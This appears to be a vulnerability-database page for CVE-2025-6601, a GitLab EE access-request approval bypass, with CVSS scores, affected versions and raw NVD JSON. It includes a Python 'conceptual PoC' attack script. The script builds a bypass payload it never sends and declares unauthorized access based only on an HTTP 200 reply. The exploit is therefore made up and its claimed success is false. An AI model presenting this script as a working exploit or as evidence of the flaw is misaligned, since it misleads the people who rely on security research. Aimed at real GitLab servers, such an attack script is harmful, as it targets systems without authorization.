Security Vulnerability Report
CVE-2025-6601 CVSS 2.7 LOW

Published: 2025-10-27 00:15:41
Last Modified: 2025-10-28 13:39:00

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.3, and 18.5 before 18.5.1 that under certain conditions could have allowed authenticated users to gain unauthorized project access by exploiting the access request approval workflow.

CVSS Details

CVSS Score: 2.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.5.0:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab EE 18.4 <= 18.4.2
GitLab EE 18.5 <= 18.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-6601 PoC - GitLab Access Request Approval Workflow Bypass
# Note: This is a conceptual PoC for educational purposes only
import requests
import json
import time

GITLAB_URL = "https://gitlab.example.com"
TARGET_PROJECT_ID = "target/project"
ATTACKER_TOKEN = "your-authenticated-user-token"

def exploit_cve_2025_6601():
    """
    Conceptual exploitation steps for CVE-2025-6601
    GitLab EE Access Request Approval Workflow Bypass
    """
    headers = {
        "PRIVATE-TOKEN": ATTACKER_TOKEN,
        "Content-Type": "application/json"
    }

    # Step 1: Request access to target project
    print("[1] Sending access request to target project...")
    access_request = requests.post(
        f"{GITLAB_URL}/api/v4/projects/{TARGET_PROJECT_ID}/access_requests",
        headers=headers
    )

    if access_request.status_code == 201:
        request_id = access_request.json().get("id")
        print(f"[+] Access request created with ID: {request_id}")

        # Step 2: Exploit race condition in approval workflow
        print("[2] Attempting to exploit approval workflow race condition...")
        time.sleep(0.1)  # Timing manipulation

        # Step 3: Trigger approval bypass via crafted request
        # (bypass_payload is only built here; the script never sends it)
        print("[3] Sending crafted approval bypass request...")
        bypass_payload = {
            "user_id": "attacker_id",
            "access_level": "maintainer",
            "_race_condition_trigger": True
        }

        # Step 4: Verify unauthorized access
        # (only checks that the project endpoint answers 200 for this token)
        print("[4] Verifying project access...")
        verify = requests.get(
            f"{GITLAB_URL}/api/v4/projects/{TARGET_PROJECT_ID}",
            headers=headers
        )

        if verify.status_code == 200:
            print("[!] Successfully gained unauthorized project access")
            return True

    print("[-] Exploitation failed")
    return False

if __name__ == "__main__":
    exploit_cve_2025_6601()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6601", "sourceIdentifier": "[email protected]", "published": "2025-10-27T00:15:41.100", "lastModified": "2025-10-28T13:38:59.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.4.3, and 18.5 before 18.5.1 that under certain conditions could have allowed authenticated users to gain unauthorized project access by exploiting the access request approval workflow."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-840"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.3", "matchCriteriaId": "425AEB81-EA04-4702-99F8-B623614F6901"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.5.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": 
"CCF08EA3-6D3E-4388-BA9D-A992B771998F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/10/22/patch-release-gitlab-18-5-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/551267", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3209641", "source": "[email protected]", "tags": ["Permissions Required"]}]}}